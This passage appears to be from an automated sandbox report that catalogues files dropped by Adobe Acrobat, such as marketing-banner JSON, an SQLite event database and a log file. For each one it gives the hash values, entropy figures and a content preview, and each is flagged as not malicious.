                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):294
                                                      Entropy (8bit):5.294710681458325
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfBoTfXpnrPeUkwRe9:YvXKXMSf0cMqGWTfXcUkee9
                                                      MD5:C082F6C8E92E87E4C01C1E193ADA943C
                                                      SHA1:CC85286DF22624B014D80EA476FA23A5A00B1A8D
                                                      SHA-256:DA286B7F11C6FEB221352F82148CB2F112CF95BEEB26A82B9BA3A055BB94ADB8
                                                      SHA-512:5592F6CD2755E1104BEF6771544B7FB18D71F6A15839E2976C03268992F340DC0D5C9306E6EE9D6D2B8F2016A19DFE58BBD438E37386A9BC5548C2A71F50D2E8
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):294
                                                      Entropy (8bit):5.273122354723186
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfBD2G6UpnrPeUkwRe9:YvXKXMSf0cMqGR22cUkee9
                                                      MD5:95C71D16B0371D3B5926D7792EEB8100
                                                      SHA1:9ACE79E2C2D9C0BBD4AA7D4784D404FA87D9B8C4
                                                      SHA-256:B8783007B3A46BD215106C49EF6A819CA89596ECD73B8B584A1FAEE1E04E65E9
                                                      SHA-512:32371FEC56261067CF60667EA50845FCA291F3B67206066F32D625A1BB36904C6CC072E5E84BE9D0583DE0BB715260DD043C12E089928BFCE8D0E3B1BEF4C6A1
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):285
                                                      Entropy (8bit):5.3252898873810075
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfPmwrPeUkwRe9:YvXKXMSf0cMqGH56Ukee9
                                                      MD5:E0CD4B8CD9DD51C95519416B0E4D5337
                                                      SHA1:6EE3F790C83A90F2FD30F588848CEBEF3DE3709B
                                                      SHA-256:700DCC410849966F002571134B1EA02912E61DD3C72F2E23A616BEABA1087D40
                                                      SHA-512:2DB4FCF2B4CF998968602C9E732D4AA02CC08867BA1CA59F25B4C47062B83FE66A5C1B99E6785D0A9F9A43F651099AAD10ACE90006DA808B8BEED857938087D9
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):2129
                                                      Entropy (8bit):5.8382567925401965
                                                      Encrypted:false
                                                      SSDEEP:48:YvlSf4hgly48Y/TWCjiOumNcXwKOpkUlQ:GlSfsgA45/TfZumcOK
                                                      MD5:28BD8ABECBAFCCA7410A63B1C99EFCDF
                                                      SHA1:21614435A86EA2646CD12BEC92EFB04C16D3F648
                                                      SHA-256:D6DFFC3DE7430D607D6CE05A0B09ECBCE663F5A3EE283830B94FA32C535F41E4
                                                      SHA-512:8C59F55BF1FDB76E19C30F6B4281292AC836B582B7EABAC2F72F67837562F7C226DBBC0B7E6AD661F7720BB0C53DF9D10DFA1C76C2862842B5C1FC1D938EF8A1
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_1","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"5a9d1955-ab74-4b89-837a-074b702313c0","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2NvbnZlcnQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRXhwb3J0IFBERnMgdG8gTWljcm9zb2Z0IFdvcmQgYW5kIEV4Y2VsLiIsImN0YUxhYmVsIjpudWxsLCJjdGFCZWhhdmlvciI6bnVsbCwiY3RhVXJsIjpudWxsLCJjdGFVcmxUeXBlIjpudWxsLC

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):289
                                                      Entropy (8bit):5.273789275098699
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJf8dPeUkwRe9:YvXKXMSf0cMqGU8Ukee9
                                                      MD5:683F5418937547F99480B3CBC9B559DD
                                                      SHA1:AF0E2ACF62195DC525AF3309836881E4BBB8CCA0
                                                      SHA-256:CA6943D27C98EA341DB0C0CAA3D75AAD265BBEE9F8A16B52B44D3DF4F3DE52E3
                                                      SHA-512:B9E63D44BC71D9E9F5CB56E06AD8333C91D4288CEBF924F4A9ADD2F44C59AF2F3738EC44CEF4E0A71369F42DFF84A0D202F6D1AC604EB9E132AC34D48D127C86
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):292
                                                      Entropy (8bit):5.2761271914009775
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfQ1rPeUkwRe9:YvXKXMSf0cMqGY16Ukee9
                                                      MD5:FDB562FBD1468CFB2EA1A8FFBB328331
                                                      SHA1:8AA5FF2E86F6A7D84D08EA8366971405A4FF7280
                                                      SHA-256:3CC8B73E4BFB812C9D78B07279916CDC926F09B2DCACAAA5FB35E24F1E0D922F
                                                      SHA-512:350532597C60795B04A461F7D581349F1272738305F66CEB7590CC6D710310471450DADAE6D7A2985711F8DB67B9233260C30BF49F4BAFAEB8BE97E73EB00612
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):2080
                                                      Entropy (8bit):5.824617191115051
                                                      Encrypted:false
                                                      SSDEEP:48:YvlSfXogbN48l/GiyLVzyODVHKOkQLcSmjWAlQ:GlSf4g54Y/IVO48OkQASme
                                                      MD5:8ADC9E19DD5BA905B9714FE3895E2473
                                                      SHA1:E2BF27E5C1C1886BB9C9B1E57449AB08413E792A
                                                      SHA-256:FC73A9C03C9102AC368D3B5A603653E8F555D552C93D966CCC71FA8A6D882A9B
                                                      SHA-512:B7F179DEF67AE0282AF67393E825E514605D98D9D50AFD3D78D1C74FA0314F6BD0360646BC1545BE97875E6EFA52088F485E39854D88C701FE8409431C3F7E59
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_2","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"164bf29d-ee04-491c-adf2-c0bfeedb2d1b","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL2VkaXQiLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjpudWxsLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGFkYXRhIjp7InN0cmluZ01ldGFkYXRhIjp

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):295
                                                      Entropy (8bit):5.301460154225357
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfzdPeUkwRe9:YvXKXMSf0cMqGb8Ukee9
                                                      MD5:C72967B37F651C2F95E1FCCE4695BD55
                                                      SHA1:8F04EB0A894E0BD5773F1FD620B6954BAB3B254D
                                                      SHA-256:ABBC3E260C9BC5016549E0A4C866AD410CB68A6231E90E036AB5999DDF1A2BC2
                                                      SHA-512:FC24EA1C39EDEAC3413FB3FC12DF518B1BC292EBA076EB8627D4C2AF70D64D88529576AF6A278AB992462E5FE3E1C6389353DCC72581330F1E71E3CA0A3958CD
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):289
                                                      Entropy (8bit):5.281438380654376
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfYdPeUkwRe9:YvXKXMSf0cMqGg8Ukee9
                                                      MD5:B18EE24804F3B16D4E3F20C40F63D633
                                                      SHA1:51F866600A1582E18D90034BA88DCADE2464F692
                                                      SHA-256:0B665D19771FD40A45D73A067813F2981F6F0027CC6CE2CD0008F31561CA6A5E
                                                      SHA-512:CEC09E578FD42450E7A8A57164A15CDCE098E859A73D714A296C0DF849212EF2E324EEC22FD9BE3C929304B297874E5B1E855978528295F9308D29039E09997B
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):284
                                                      Entropy (8bit):5.267743318024722
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJf+dPeUkwRe9:YvXKXMSf0cMqG28Ukee9
                                                      MD5:DC57D209F4DCD18E2C8522E926D94C0D
                                                      SHA1:B373F600A040622EBB4BC56DA2BFDE0406D207D6
                                                      SHA-256:6274B3A1BE688750CC4ACE6473C493CA3BF0D835A1B088E5451AC81EDCDA33C0
                                                      SHA-512:148D90A0AAC84D52B49921F11EE0F19921124511AC98C8B15955669E77B846D9404199AABC57203D789FBBFD8E9973B5CDE7708B975C802DA16EB17E10C5249A
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):291
                                                      Entropy (8bit):5.265113049595219
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfbPtdPeUkwRe9:YvXKXMSf0cMqGDV8Ukee9
                                                      MD5:68A9197B1DF0A3F177D194D76A793054
                                                      SHA1:AC4E5A983635804D457671130B727B59CB44E40C
                                                      SHA-256:1801C6A9681351FB9B0EDE686E8E95AC253A928AA565C82FA49849F9536479D2
                                                      SHA-512:AE289B33E625232B598A303832AF4BC4C54F1B833CC596FB7367FF9754E45EBEF350825925A03C3BA2B4419911C3D45934A9F54CA2C2E0BBC62F9A275E9F2719
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):287
                                                      Entropy (8bit):5.26792306876699
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJf21rPeUkwRe9:YvXKXMSf0cMqG+16Ukee9
                                                      MD5:EA4A8E3E060B25531D009AA93D522233
                                                      SHA1:62665467069B2891CB2C4BFF50C308590FB60E35
                                                      SHA-256:85501299492BAE3C582D4B2DA940858A3C25AEB1A9FEE564708375A4B190ABB4
                                                      SHA-512:EF747DD31212102B873F8CEADD4A2B6976353F8BD05A2DDD3943910CD0652620E6630C67C8BD5B208559B2B6273A1F57474DC8CC3CFED082E974C5DFDDF3AC83
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):2028
                                                      Entropy (8bit):5.839647742483915
                                                      Encrypted:false
                                                      SSDEEP:24:Yv6XMSfZKamXayLgEdycgNaLcR84bqerISIQ1iyLPZYMWD8W3V1LFnU6QHlOBEDB:YvlSfqBgBG48j/SiyLVWOAlNkUlQ
                                                      MD5:517D812493B10282E45697C29305C65E
                                                      SHA1:9EDCDEA5DC84DE8BAEC2ED91080563EA05D5D9CC
                                                      SHA-256:2B160A6298098D95EA2387C2DF262C38C85C7F9FB129027F8F655B833709A164
                                                      SHA-512:6272E8F5DBA716552880144D3041D4F0B397057BDE77353B8D6210C00BADC22E620686EE635BFE39B18CDF4D59701F060FB53657F9439349AA8D8B3B20B47904
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"102656_316349ActionBlock_0","campaignId":102656,"containerId":"1","controlGroupId":"","treatmentId":"339c0ba6-2e61-4622-82f6-f07787d206b8","variationId":"316349"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJkYXRhIjp7ImxocFYyQnlQYXRoIjp7Iml0ZW0iOnsiX3BhdGgiOiIvY29udGVudC9kYW0vYWNyb2JhdGRlc2t0b3AvZ3Jvd3RoL3JlYWRlci9lbi11cy9saHAtYmFubmVyL3YyL3NpZ24iLCJfdmFyaWF0aW9uIjoicmdzMDM2MS0wIiwidGl0bGUiOm51bGwsImRlc2NyaXB0aW9uIjoiRWFzaWx5IGZpbGwgYW5kIHNpZ24gUERGcy4iLCJjdGFMYWJlbCI6bnVsbCwiY3RhQmVoYXZpb3IiOm51bGwsImN0YVVybCI6bnVsbCwiY3RhVXJsVHlwZSI6bnVsbCwidHJhY2tpbmdJZCI6bnVsbCwiX21ldGF

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):286
                                                      Entropy (8bit):5.245363962772696
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJfshHHrPeUkwRe9:YvXKXMSf0cMqGUUUkee9
                                                      MD5:195BB7946ED0339889FE9AFA3C6F5F04
                                                      SHA1:28906C83EDCB465B1FBB4FB030FE20F154FC2C9B
                                                      SHA-256:ADFC619603024ABD5B2E433F2D1AD6E9BF1A8F1DA0C23743F2E63C39E0D1C6FD
                                                      SHA-512:98D3BF9D934F522C9F00CD5F32D4CA33371AF01F49FF32BC1FBD4F0807C138EA687BB09CA0FBEB463D87C5E962BB1355AE2A4751913A52DB60B35FCFA33C4607
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):282
                                                      Entropy (8bit):5.2547940670312
                                                      Encrypted:false
                                                      SSDEEP:6:YEQXJ2HXJZRySRp0nZiQ0YnThoAvJTqgFCrPeUkwRe9:YvXKXMSf0cMqGTq16Ukee9
                                                      MD5:755A0429FCDB1416F0F8460DCB8183FC
                                                      SHA1:89530376296865996DB7DDAFC625DC42D633F917
                                                      SHA-256:881BF5C448BB061AECBC6FA49CC3915619A4FDA7F3087F0F6ACE0CB0A98ADEEF
                                                      SHA-512:1A7A5E47F20CA75C555A935A2C5D1675BC1C88E4F028957C28329621813998A1962D4C3D6EB29AAD8DFCB97E55310D1E038DFF951DC652672FE41684D0195A4C
                                                      Malicious:false
                                                      Preview:{"analyticsData":{"responseGUID":"dfc4c0a4-1e5f-4e27-836d-17109effb9c0","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1743079147467,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4
                                                      Entropy (8bit):0.8112781244591328
                                                      Encrypted:false
                                                      SSDEEP:3:e:e
                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                      Malicious:false
                                                      Preview:....

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):2815
                                                      Entropy (8bit):5.115017878012367
                                                      Encrypted:false
                                                      SSDEEP:48:YGEXyaeB6AtseA5A3TyEu1n3cgskwAPcj9R97jA6iC6R9SbgjTB4X:Bac5WtE2sg4ASAhKgJY
                                                      MD5:81A8503F9BD1771FA40FB311BC3AEFE1
                                                      SHA1:C791A7DC80D9512E575780F8A58E3E6FB56F99D7
                                                      SHA-256:24C482488D9A881A10156BE4710864A8B60203FD5E7B3C5B539E1EAAD1513370
                                                      SHA-512:B7B373B90844CE1CCBDD0780AFE4CAEE25F772DFFC54C5E311058CC528FEEC494BAA37EE59287367C33CAC62C0D9EA3AB8C5539AC4878040338B5B9200D8AECB
                                                      Malicious:false
                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"e87829104153d064e809be85372f4cad","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1742900032000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c5266578d6a97211f9f6269c475e5201","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":2028,"ts":1742900032000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"61f362e0e9dcf10ba1ced100f98db1de","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":2129,"ts":1742900032000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"fd082bd8af566481dc58a64baf4d9f41","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2080,"ts":1742900032000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"57504fb5fc3c0bdf61bfee08c4c8d3d4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1742900032000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"59d77a3ff200c95b04421e638ebfba73","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file",

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                      Category:dropped
                                                      Size (bytes):12288
                                                      Entropy (8bit):1.1465751143402854
                                                      Encrypted:false
                                                      SSDEEP:24:TLhx/XYKQvGJF7ursL5uRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudc:TFl2GL7msdwXc+XcGNFlRYIX2v3kK2
                                                      MD5:618CDA0AB2261A0A8F102DBF67C62D3C
                                                      SHA1:97DD92936A5008B4642D0606F20435A445D0A251
                                                      SHA-256:9D74B16F83A9514858E3338C6750F2077A2B8BAFE8A2A7B4030D6B74316100C6
                                                      SHA-512:1A21134DC9E8D9F5098E3DA19AB516F21BDBCE73FFA547A9E76BCFC879527D9B088E72C7D0423BE4823B42BA5AF7BA040915046BC238DF51211AB8813E79B4EF
                                                      Malicious:false
                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:SQLite Rollback Journal
                                                      Category:dropped
                                                      Size (bytes):8720
                                                      Entropy (8bit):1.5511561437575472
                                                      Encrypted:false
                                                      SSDEEP:24:7+tHO5uUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxbqLxx/XW:7MHknXc+XcGNFlRYIX2vuqVl2GL7msU
                                                      MD5:BF7B484F25336CD8AC83FD028D67FED5
                                                      SHA1:1FC4F5E0CE7481D847A651D421B0189C099141D4
                                                      SHA-256:9359DC6F4D39744F1F275A40ABEA109DA4D82C4FED2000E6C53DE272032167ED
                                                      SHA-512:A2DC3A43DCB8A8A162D8EE072538FAC13AB36CDCF5D03474BA740BD22F5D2BD4CB4B55960C54BF8FEF69DF08D73B101F3AB17D5E01B1248D7373CBE178871EF7
                                                      Malicious:false
                                                      Preview:.... .c..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\MSI285fc.LOG

                                                      Download File
                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):246
                                                      Entropy (8bit):3.5197430193686525
                                                      Encrypted:false
